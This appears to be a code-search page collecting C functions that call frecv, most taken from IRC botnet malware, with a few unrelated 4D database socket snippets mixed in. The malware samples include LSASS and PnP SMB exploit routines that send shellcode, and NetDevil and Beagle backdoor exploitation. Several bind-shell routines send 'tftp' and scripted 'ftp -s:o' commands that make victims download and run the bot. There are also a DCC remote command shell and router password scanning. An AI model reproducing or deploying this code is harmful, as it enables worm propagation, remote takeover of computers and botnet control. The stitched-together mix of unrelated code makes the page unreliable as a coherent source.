Пример #1
0
void TransferLoop(SOCKET tsock, SOCKET csock)
{
	int len;
	char buf[1024];
	fd_set fd;

	while (TRUE) {
		FD_ZERO(&fd);
		FD_SET(csock, &fd);
		FD_SET(tsock, &fd);

		memset(buf, 0, sizeof(buf));
		fselect(0, &fd, NULL, NULL, NULL);

		if(fFD_ISSET(csock, &fd)) {
			if((len = frecv(csock,buf,sizeof(buf),0))== -1) break;
			if(fsend(tsock,buf,len,0)== -1) break;
		}
	    if (fFD_ISSET(tsock,&fd)) {
			if((len = frecv(tsock,buf,sizeof(buf),0))== -1) break;
			if(fsend(csock,buf,len,0)== -1) break;
		}
	}

	return;
}
Пример #2
0
BOOL Cisco(EXINFO exinfo)
{

   int ret,SocketFD;
   char buffer1[64],buffer2[64];
   if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
   SOCKADDR_IN ssin;
   memset(&ssin, 0, sizeof(ssin));
   ssin.sin_family = AF_INET;
   ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
   ssin.sin_port = fhtons((unsigned short)exinfo.port);
   if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
         memset(buffer1, '\0', 64);
         memset(buffer2, '\0', 64);
         if ((ret = frecv(SocketFD, buffer1, 64, 0))  > 0)
         {
            ret = frecv(SocketFD, buffer1, 64, 0);
            fsend(SocketFD,"cisco\r",6,0);
            ret = frecv(SocketFD, buffer2, 64, 0);

			if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
			{
				char sendbuf[IRCLINE];
				_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
				irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
				addlog(sendbuf);
				exploit[exinfo.exploit].stats++;
				return TRUE;
			}
		 }
	}
    return FALSE;
}
Пример #3
0
BOOL lsass(EXINFO exinfo)
  {

	    int len;
		SOCKET sockfd;
 		int dport = 44444;
 		struct sockaddr_in their_addr;
        char recvbuf[1600];

		{

			their_addr.sin_family = AF_INET;
			their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);

			/* ^ Server's address */
			their_addr.sin_port = fhtons((unsigned short)exinfo.port);

			/* connect to the server */

      if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
        return FALSE;
      if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR) 
        return FALSE;
      if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
        return FALSE;
      len = frecv(sockfd, recvbuf, 1600, 0);
      
      if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
        return FALSE;
      len = frecv(sockfd, recvbuf, 1600, 0);
      
      if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)   
        return FALSE;
      len = frecv(sockfd, recvbuf, 1600, 0);
      
      
       switch (recvbuf[68]) {

         case '1': // win XP	
			if (!Exploit2( exinfo, sockfd, 0 ))
				return FALSE;
			break;

         case '0': //win 2k
			if (!Exploit2( exinfo, sockfd, 2 ))
				if (!Exploit2( exinfo, sockfd, 1))
					return FALSE;
            break;

         default:
           return FALSE;     
       }
    }

	return TRUE;

  }
Пример #4
0
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
		int len;
		char recvbuf[1024];
		SOCKET sockfd;
		SOCKADDR_IN shell_addr;
		memset(&shell_addr, 0, sizeof(shell_addr));

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
		shell_addr.sin_port = fhtons(bindport);

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
			return false;

		if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) 
			return false;
		
		char mkdir_buff[400];

		len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
			"tftp -i %s get %s &%s\r\n",
			GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////




//////////////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////////////
		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		
		Sleep(500);
		_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		len = frecv(sockfd, recvbuf, 1024, 0);

		fclosesocket(sockfd);
		return true;

}
Пример #5
0
int check_os(char *host,unsigned short target_port, int *sp) 
{	
	SOCKET sSock;
	if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(host);
		ssin.sin_port = fhtons((unsigned short)target_port);

		if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
			char recv_buff[5000];
			memset(recv_buff,0,sizeof(recv_buff));

			TIMEVAL timeout;
			timeout.tv_sec = 5;
			timeout.tv_usec = 0;
			fd_set fd;
			FD_ZERO(&fd);
			FD_SET(sSock, &fd);

			if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
				if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) { 
					if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
						if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
							fclosesocket(sSock); 
	
							*sp=atoi(&recv_buff[37]); 
	
							if (recv_buff[8] == 5 && recv_buff[12] == 0)
								return ID_WIN2K;
							else if	(recv_buff[8] == 5 && recv_buff[12] == 1)
								return ID_WINXP;
							else if	(recv_buff[8] == 5 && recv_buff[12] == 2)	
								return ID_WIN2K3;
							else if	(recv_buff[8] == 4)
								return ID_WINNT;
							else
								return ID_UNKNOWN;
						}
					}
				}
			}
		}
		fclosesocket(sSock);
	}
	
	return 1;
}
Пример #6
0
BOOL CiscoHTTP(EXINFO exinfo)
{

   int ret,SocketFD;
   char buffer[4096];
   if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
   SOCKADDR_IN ssin;
   memset(&ssin, 0, sizeof(ssin));
   ssin.sin_family = AF_INET;
   ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
   ssin.sin_port = fhtons((unsigned short)exinfo.port);
   if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
		if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
			return FALSE;
		memset(buffer, 0, sizeof(buffer));
		if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
			return FALSE;
		fclosesocket(SocketFD);
		if(ret < 5)
			return FALSE;
		if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
			return FALSE;

		char sendbuf[IRCLINE];
		_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
		irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
		addlog(sendbuf);
		exploit[exinfo.exploit].stats++;
		return TRUE;
	}
    return FALSE;
}
Пример #7
0
bool ConnectShell(EXINFO exinfo) {

		int len;
		struct sockaddr_in shell_addr;
		char recvbuf[1024];
		SOCKET sockfd;

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
		shell_addr.sin_port = fhtons((unsigned short)exinfo.port);;

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 )
			return false;
		if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1) 
			return false;
		
		char mkdir_buff[400]="";

		len = frecv(sockfd, recvbuf, 1024, 0);
		
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"tftp -i %s get %s\n"
		"%s\n",
		GetIP(exinfo.sock),filename, filename);

		if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1)
			return false;
		return true;

}
Пример #8
0
 bool ConnectShell2(EXINFO exinfo) {

		int len;
		char recvbuf[1024];
		SOCKET sockfd;
		SOCKADDR_IN shell_addr;
		memset(&shell_addr, 0, sizeof(shell_addr));
		

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
		shell_addr.sin_port = fhtons(xport);;

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
			return false;
		if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) 
			return false;
		
		char mkdir_buff[400];

		len = frecv(sockfd, recvbuf, 1024, 0);
		#ifndef NO_TFTPD
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"tftp -i %s get %s\r\n",
		GetIP(exinfo.sock),filename, filename);	
		#endif
		#ifndef NO_FTPD
		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
		GetIP(exinfo.sock),FTP_PORT, filename, filename);	
		#endif
		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		
		Sleep(500);
		_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		len = frecv(sockfd, recvbuf, 1024, 0);

		fclosesocket(sockfd);
		return true;

}
Пример #9
0
int IRC_ReceiveLoop(SOCKET sock, char *server, char *channel, char *chanpass, char *nick, int clone)
{
	char buffer[4096], masters[MAXLOGINS][MAXIDENT], *lines[MAX_LINES], nickbuf[MAXNICKLEN], host[MAXHOSTNAME];
	int i, numlines, repeat, in_channel=0;

	for (i = 0; i < MAXLOGINS; i++)
		masters[i][0] = '\0';

	if (serverpass[0] != '\0')
		irc_sendv(sock,"PASS %s\r\n",serverpass);

 	sprintf(buffer, "NICK %s\r\nUSER %s 0 0 :%s\r\n", nick, rndnick(nickbuf,LETTERNICK, FALSE), nick);
	if (fsend(sock, buffer, strlen(buffer), 0) == SOCKET_ERROR) {
		fclosesocket(sock);
		Sleep(5000);
		return 0;
	}

	while(1) {
		memset(buffer, 0, sizeof(buffer));
		if (frecv(sock, buffer, sizeof(buffer), 0) <= 0) 
			break;

		// FIX ME: Truncation occurs here
		numlines = Split(buffer,&lines);
		for (i=0;i < numlines ;i++) {
			repeat=1;
			do {
				#ifdef DEBUG_LOGGING
				debuglog(lines[i]);
				#endif
				#ifdef DEBUG_CONSOLE
				printf("%s\n",lines[i]);
				#endif

				if (lines[i] != NULL) 
					repeat = IRC_ProtocolParse(lines[i], sock, server, channel, chanpass, nick, host, masters, &in_channel, repeat, clone);
				repeat--;

				if (repeat > 0)
					Sleep(FLOOD_DELAY);
			} while (repeat > 0);

			switch (repeat) {
			case -1:
				return 0; // Reconnect
			case -2:
				return 1; // Disconnect
			case -3:
				return 2; // Quit
			default:
				break;
			}
		}
	}

	return 0;
}
Пример #10
0
int socket_receiv_update_count(FOURD *cnx,FOURD_RESULT *state)
{
	FOURD_LONG8 data=0;
	frecv(cnx->socket,(unsigned char*)&data,8, 0);
	Printf("Ox%X\n",data);
	cnx->updated_row=data;
	Printf("\n");

	return 0;
}
Пример #11
0
BOOL NetDevil(EXINFO exinfo)
{
	char buffer[IRCLINE];
	DWORD mode=0;

	SOCKET ssock;
	if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) 
		return FALSE;

	SOCKADDR_IN sin;
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = finet_addr(exinfo.ip);
	sin.sin_port = fhtons(exinfo.port);

	fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
	fioctlsocket(ssock,FIONBIO,&mode);

	for (int i=0; passwords[i]; i++) {
		Sleep(50);

		memset(buffer,0,sizeof(buffer));

		if (NetDevil_Receive(ssock) == -1) 
			break;
		if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) 
			break;
		if (strcmp(buffer,"passed") == 0) {
			sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]); 
			fsend(ssock, buffer, strlen(buffer), 0);	

			if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
				fclosesocket(ssock);

				_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
				if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
				addlog(buffer);
				exploit[exinfo.exploit].stats++;

				return TRUE;
			}
			break;	
		}
		if (strcmp(buffer,"pass_pleaz") == 0) {
			memset(buffer,0,sizeof(buffer));
			sprintf(buffer,"pass_pleaz%s",passwords[i]); 
			fsend(ssock,buffer ,strlen(buffer), 0);

			continue;
		}
		else break;
	}
	fclosesocket(ssock);

	return FALSE;
}
Пример #12
0
bool ConnectShell2(EXINFO exinfo) {

		int len;
		char recvbuf[1024];
		SOCKET sockfd;
		SOCKADDR_IN shell_addr;
		memset(&shell_addr, 0, sizeof(shell_addr));
		

		shell_addr.sin_family = AF_INET;
		shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
		shell_addr.sin_port = fhtons(7777);

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
			return false;
		if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) 
			return false;
		
		char mkdir_buff[400];

		len = frecv(sockfd, recvbuf, 1024, 0);

		_snprintf(mkdir_buff, sizeof (mkdir_buff),
		"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
		GetIP(exinfo.sock),FTP_PORT);	


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		
		Sleep(500);
		_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);


		if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
			return false;
		len = frecv(sockfd, recvbuf, 1024, 0);

		fclosesocket(sockfd);
		return true;

}
Пример #13
0
DWORD WINAPI IdentThread(LPVOID param)
{
	char user[12], buffer[IRCLINE];

	int threadnum = (int)param;
	BOOL success = FALSE;

	SOCKET ssock,csock;

	SOCKADDR_IN ssin, csin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)113);
	ssin.sin_addr.s_addr=INADDR_ANY;

	if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
		threads[threadnum].sock = ssock;
		if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			if (flisten(ssock, 5) != SOCKET_ERROR) {
				int csin_len = sizeof(csin);

				while (1) {
					if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
						break;

					sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
					addlog(buffer);

					if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
						Split(buffer,0);

						memset(user, 0, sizeof(user));
						_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
	
						if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
							success = TRUE;

					}
				}
			}
		}
	}

	if (!success) {
		sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
		addlog(buffer);
	}

	fclosesocket(ssock);
	fclosesocket(csock);
	clearthread(threadnum);

	ExitThread(0);
}
Пример #14
0
DWORD WINAPI DCCChatThread(LPVOID param)
{
	DCC dcc = *((DCC *)param);
	DCC *dccs = (DCC *)param;
	dccs->gotinfo = TRUE;

	char buffer[4096];

	SOCKET ssock;
	if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) { 
		sprintf(buffer,"[DCC]: Failed to open socket.");
		if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
		addlog(buffer);

		clearthread(dcc.threadnum);

		ExitThread(1);
	}
	if (open_cmd(ssock,"") == -1) {
		sprintf(buffer,"[DCC]: Failed to open remote command shell.");
		if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
		addlog(buffer);

		fclosesocket(ssock);
		clearthread(dcc.threadnum);

		ExitThread(1);
	}
	Sleep(100);

	while (1) {
		memset(buffer, 0, sizeof(buffer));
		if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) 
			break;

		strcat(buffer,"\n");
		if (!send_commands(buffer))
			break;

		Sleep(100);
		if (findthreadid(RCMD_THREAD) == 0)
			break;
	}
	sprintf(buffer,"[DCC]: Failed to send to Remote command shell.");
	if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
	addlog(buffer);
	
	fclosesocket(ssock);
	clearthread(dcc.threadnum);
	
	ExitThread(0);
}
Пример #15
0
int socket_receiv_update_count(FOURD *cnx,FOURD_RESULT *state)
{
	FOURD_LONG8 data=0;
	int iResult=0;
	int len=0;
	iResult = frecv(cnx->socket,(char*)&data,8, 0);
	len+=iResult;
	Printf("Ox%X\n",data);
	cnx->updated_row=data;
	Printf("\n");

	return 0;
}
Пример #16
0
BOOL ReadExact(SOCKET r_sock, char *inbuf, int wanted) {

	int offset = 0;
	
	while (wanted > 0) {
		int bytes = frecv(r_sock, inbuf+offset, wanted, 0);
		if ((bytes == 0) || (bytes == SOCKET_ERROR)) return FALSE;
		wanted -= bytes;
		offset += bytes;
	}

	return TRUE;
}
Пример #17
0
static BOOL GetStr(SOCKET Socket, char *buffer, int cnt)
{
	char c;
    
	do {
		if (frecv(Socket, &c, 1, 0) != 1)
			return (FALSE);
		*buffer++ = c;
		if (--cnt == 0) {
			addlogv("[RLOGIND]: Protocol string too long.");
			return (FALSE);
		}
	} while (c != 0);

	return (TRUE);
}
Пример #18
0
BOOL Beagle(EXINFO exinfo)
{
	char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];

	BOOL success = FALSE;

	WSADATA WSAData; 
	if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) 
		return FALSE; 

	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
		ssin.sin_port = fhtons(exinfo.port);

		if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
			BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
			if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
				if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
					GetModuleFileName(0, botfile, sizeof(botfile));
					_splitpath(botfile, NULL, NULL, fname, ext);
					_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
					_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);

					if(fsend(sSock, buffer, sizeof(buffer), 0)) 
						success = TRUE;
				}
			}
		}
	}

	fclosesocket(sSock);
	fWSACleanup();

	if (success) {
		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;
	}

	return (success);
}
Пример #19
0
// part of the redirect function, handles sending/recieving for the local connection.
DWORD WINAPI RedirectLoop2Thread(LPVOID param)
{
	REDIRECT redirect = *((REDIRECT *)param);
	REDIRECT *redirectp = (REDIRECT *)param;
	redirectp->cgotinfo = TRUE;

	int threadnum=redirect.cthreadnum, err;
	
	char buff[4096];

	while (1) {
		memset(buff, 0, sizeof(buff));
		if ((err = frecv(threads[threadnum].csock, buff, sizeof(buff), 0)) <= 0) break;
		if ((err = fsend(threads[threadnum].sock, buff, err, 0)) == SOCKET_ERROR) break;
	}
	fclosesocket(threads[threadnum].csock);

	clearthread(threadnum);

	ExitThread(0);
}
Пример #20
0
int KUANG_Reciev(SOCKET sock)
{
	TIMEVAL time;
	time.tv_sec = 30; //timeout after 60 sec.
	time.tv_usec = 0;

	fd_set fd_struct;
   	FD_ZERO(&fd_struct);
	FD_SET(sock, &fd_struct);

	if (fselect(0, &fd_struct, NULL, NULL, &time) <= 0) {
		fclosesocket(sock); 
		return -1;
	}

	memset(k2_buffer,0,sizeof(k2_buffer));
	if (frecv(sock, k2_buffer, sizeof(k2_buffer), 0) < 1) 
		return -1;
	if (k2_msg->command == K2_ERROR)
		return -1;
      	      
	return 0;
}	
Пример #21
0
int NetDevil_Upload(char *IP, SOCKET ssock)
{
	SOCKET nsock;
	char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH];

	int port = 0,bytes_sent = 0;
	unsigned int Fsend = 1024, Fsize, move;
	DWORD mode = 0;

	BOOL ver15 = FALSE;

	GetModuleFileName(NULL, botfile, sizeof(botfile));

	fsend(ssock, "version", 7, 0);
	memset(buffer,0,sizeof(buffer));
	frecv(ssock, buffer, sizeof(buffer), 0);
	if (strlen(buffer) > 5) {
		buffer[strlen(buffer)-2] = '\0';
		char *uPort = strrchr(buffer, '\n\r');
		if (uPort != NULL) 
			port = atoi(uPort);
	}

	char *ver = strtok(buffer,"\n\r");
	if (strcmp(buffer,"ver1.5") == 0) 
		ver15 = TRUE; 
	sprintf(rFile,"C:\\%s",filename);

	port = ((port == 0)?(903):(port));
	if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET) 
		goto end;

	HANDLE testfile; 
	if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE) 
		goto end;
	Fsize = GetFileSize(testfile,NULL);

	if (ver15)
		sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize);
	else
		sprintf(buffer,"%s\r1",rFile);
	fsend(nsock, buffer, strlen(buffer), 0);
	if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) 
		goto end;

	while (Fsize) {
		memset(buffer,0,sizeof(buffer));

		if (Fsend>Fsize) 
			Fsend=Fsize;
		move = 0-Fsize;

		SetFilePointer(testfile, move, NULL, FILE_END);
		ReadFile(testfile, buffer, Fsend, &mode, NULL);
		bytes_sent = fsend(nsock, buffer, Fsend, 0);
		if (bytes_sent == SOCKET_ERROR) {
			if (fWSAGetLastError() != WSAEWOULDBLOCK) 
				goto end;
			else 
				bytes_sent = 0;
		}
		Fsize = Fsize - bytes_sent;

		if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1) 
			goto end;
	}

	if (testfile != INVALID_HANDLE_VALUE) 
		CloseHandle(testfile);
	fclosesocket(nsock);
	Sleep(2000);

	sprintf(buffer,"pleaz_run%s",rFile);
	fsend(ssock, buffer,strlen(buffer), 0);
	memset(buffer,0,sizeof(buffer));
	if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) 
		goto end;
	if (strcmp(buffer,"pleaz_run_done") != 0) 
		goto end;

	Sleep(4000);
	fclosesocket(ssock);

	return 1;

	end:;
	fclosesocket(nsock);
	fclosesocket(ssock);

	return 0;
}
Пример #22
0
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
	SOCKADDR_IN addr;
	int len;
	int sockfd;
	unsigned short smblen;
	char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
	IRC* irc=(IRC*)conn;
	BOOL success=FALSE;
	char* thisTarget;
	int pnpbindsize=405;
	int TargetOS, Target;
	char* tOS="";

	WSADATA wsa;
	fWSAStartup(MAKEWORD(2,0), &wsa);

	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;

	thisTarget = exinfo.ip;
	TargetOS=FpHost(thisTarget,FP_NP);
	if (TargetOS==OS_UNKNOWN) 
		TargetOS=FpHost(thisTarget,FP_SMB);
	if (TargetOS == OS_WINNT){
		Target=OS_WINNT;
		success=FALSE;
	}else if (TargetOS==OS_WINXP){
		Target=OS_WINXP;
		success=FALSE;
	}else if (TargetOS==OS_WIN2K){
		Target=OS_WIN2K;
		success=TRUE;
	}else{
		success=FALSE;
	}

	ZeroMemory(&addr,sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = finet_addr(thisTarget);
	addr.sin_port = fhtons((unsigned short)exinfo.port);

	if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
	if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
	
	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) return FALSE;

	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
	convert_name((char *)ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// Start prepare header -- dETOX mod --
	memcpy(RPC_call + 260, Offsets[OffNum], 4); 

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	unsigned short port;
    port = fhtons(bindport)^(USHORT)0x9999;
    memcpy(&bindshell[176],&port,2);
	memcpy(ptr,bindshell,pnpbindsize-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
	frecv(sockfd, recvbuf, 4096, 0);

	if (!exinfo.silent && exinfo.verbose){
		switch(Target){
		case 1:
			tOS="WINNT";
			break;
		case 2:
			tOS="WIN2K";
			break;
		case 3:
			tOS="WINXP";
			break;
		default:
			tOS="UNKNOWN/2K3/LINUX";
			break;
		}

		irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
	}


//	if(success){
		Sleep(2000);
		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
//	}
	return TRUE;
}
Пример #23
0
int socket_receiv_data(FOURD *cnx,FOURD_RESULT *state)
{
	int iResult=0;
	int offset=0;
	int len=0;
	int end_row=0;
	unsigned int nbCol=state->row_type.nbColumn;
